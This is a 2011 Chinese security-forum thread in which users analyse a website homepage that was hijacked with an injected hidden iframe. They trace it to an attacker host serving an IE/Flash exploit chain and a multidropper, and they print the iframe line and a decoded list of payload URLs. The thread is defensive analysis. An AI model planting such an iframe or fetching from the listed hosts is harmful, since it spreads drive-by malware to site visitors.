是被挂马还是管理员在调整网站？

nkspark

首页内容变成：
<iframe src=http://ads31.3322.org:8832/FM01/index.html width=100 height=0><script language="javascript" type="text/javascript" src="http://js.users.51.la/2718301.js"></script>

其中2718301.js内容为：
document.write(
'<a href="http://www.51.la/?2718301" target="_blank"
title="
我
要
啦
免
费
统
计
VIP 用
户
">贵
宾
统
计
</a>\n');
var a8301tf="51la";
var a8301pu="";
var a8301pf="51la";
var a8301su=window.location;
var a8301sf=document.referrer;
var a8301of="";
var a8301op="";
var a8301ops=1;
var a8301ot=1;
var a8301d=new Date();
var a8301color="";
if (navigator.appName=="Netscape"){a8301color=screen.pixelDepth;
} else {a8301color=screen.colorDepth;
}
try{a8301tf=top.document.referrer;
}catch(e){}
try{a8301pu =window.parent.location;
}catch(e){}
try{a8301pf=window.parent.document.referrer;
}catch(e){}
try{a8301ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;
]*)(;
|$)"));
a8301ops=(a8301ops==null)?1: (parseInt(unescape((a8301ops)[2]))+1);
var a8301oe =new Date();
a8301oe.setTime(a8301oe.getTime()+60*60*1000);
document.cookie="AJSTAT_ok_pages="+a8301ops+ ";
path=/;
expires="+a8301oe.toGMTString();
a8301ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;
]*)(;
|$)"));
if(a8301ot==null){a8301ot=1;
}else{a8301ot=parseInt(unescape((a8301ot)[2]));
a8301ot=(a8301ops==1)?(a8301ot+1):(a8301ot);
}a8301oe.setTime(a8301oe.getTime()+365*24*60*60*1000);
document.cookie="AJSTAT_ok_times="+a8301ot+";
path=/;
expires="+a8301oe.toGMTString();
}catch(e){}
a8301of=a8301sf;
if(a8301pf!=="51la"){a8301of=a8301pf;
}if(a8301tf!=="51la"){a8301of=a8301tf;
}a8301op=a8301pu;
try{lainframe}catch(e){a8301op=a8301su;
}document.write('<img style="width:0px;
height:0px" src="http://vip.51.la:82/go.asp?svid=2&id=2718301&tpages='+a8301ops+'&ttimes='+a8301ot+'&tzone='+(0-a8301d.getTimezoneOffset()/60)+'&tcolor='+a8301color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a8301of)+'&vpage='+escape(a8301op)+'" />');

这两个文件从内容上看没毛病。网上搜索http://vip.51.la:82/go.asp?svid为流量统计网站。

初步判定是卡饭网站管理员在调整网站，卖流量赚钱？

kangzhen

明显的挂马~~~

remind_me

回复 1楼 nkspark 的帖子

大哥，指向的网站在赚钱，不是卡饭……

DearJohn

初步判定错误

问题不在那个js上，而是上面的iframe。。。。
hxxp://ads31.3322.org:8832/FM01/index.html

nkspark

DearJohn 发表于 2011-5-25 00:54
初步判定错误

问题不在那个js上，而是上面的iframe。。。。

二次判定：
ff.htm - JS/CVE-2008-0015!exploit
fm01.css - Win32/Multidropper.SG

DearJohn

回复 5楼 nkspark 的帖子

你可以继续第三次判定：
miss  hxxp://ads31.3322.org:8832/FM01/nb.swf

nkspark

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000
http://bbs.kafan.cn/thread-976682-1-1.html

2011.5月
新威胁名称
clsid:{d27cdb6e-ae6d-11cf-96b8-444553540000}      Exploit.Ie0dayCVE0806.a      

nkspark

DearJohn 发表于 2011-5-25 01:15
回复 5楼 nkspark 的帖子

你可以继续第三次判定：

动作挺快啊

kangzhen

nkspark 发表于 2011-5-25 01:19
动作挺快啊

无需继续判定，样本在此http://bbs.kafan.cn/thread-992275-1-1.html

DearJohn

回复 8楼 nkspark 的帖子

关于:hxxp://ads31.3322.org:8832/FM01/index.html解密的日志(全体输出 -  18):

Level  0>hxxp://ads31.3322.org:8832/FM01/index.html
Level  1>hxxp://js.tongji.linezing.com/2295841/tongji.js
Level  1>hxxp://www.linezing.com
Level  1>hxxp://ads31.3322.org:8832/FM01/ff.htm
Level  2>hxxp://ads31.3322.org:8832/FM01/ap.js
Level  2>hxxp://58.221.36.199:8832/xx/fm01.css
Level  1>hxxp://ads31.3322.org:8832/FM01/fl.htm
Level  2>hxxp://ads31.3322.org:8832/FM01/nb.swf
Level  2>hxxp://ads31.3322.org:8832/FM01/sc=----Vt=_GVUVBBB_d0@phjYh32hUserTFjYhonhurlmTuhonhurlmTFjYnhl32hshelTFojYOjjSjV3@
Level  2>hxxp://ads31.3322.org:8832/FM01/#ffffff
Level  2>hxxp://ads31.3322.org:8832/FM01/high
Level  2>hxxp://ads31.3322.org:8832/FM01/nb.swf
Level  2>hxxp://ads31.3322.org:8832/FM01/false
Level  2>hxxp://ads31.3322.org:8832/FM01/sameDomain
Level  2>hxxp://www.adobe.com/go/getflashplayer_cn
Level  2>hxxp://58.221.36.199:8832/xx/fm01.css
Level  2>hxxp://58.221.36.199:8832/xx/fm01.css
Level  2>hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0

日志由 Redoce2.1第20次修正版于 2011/5/25 1:22:20 生成。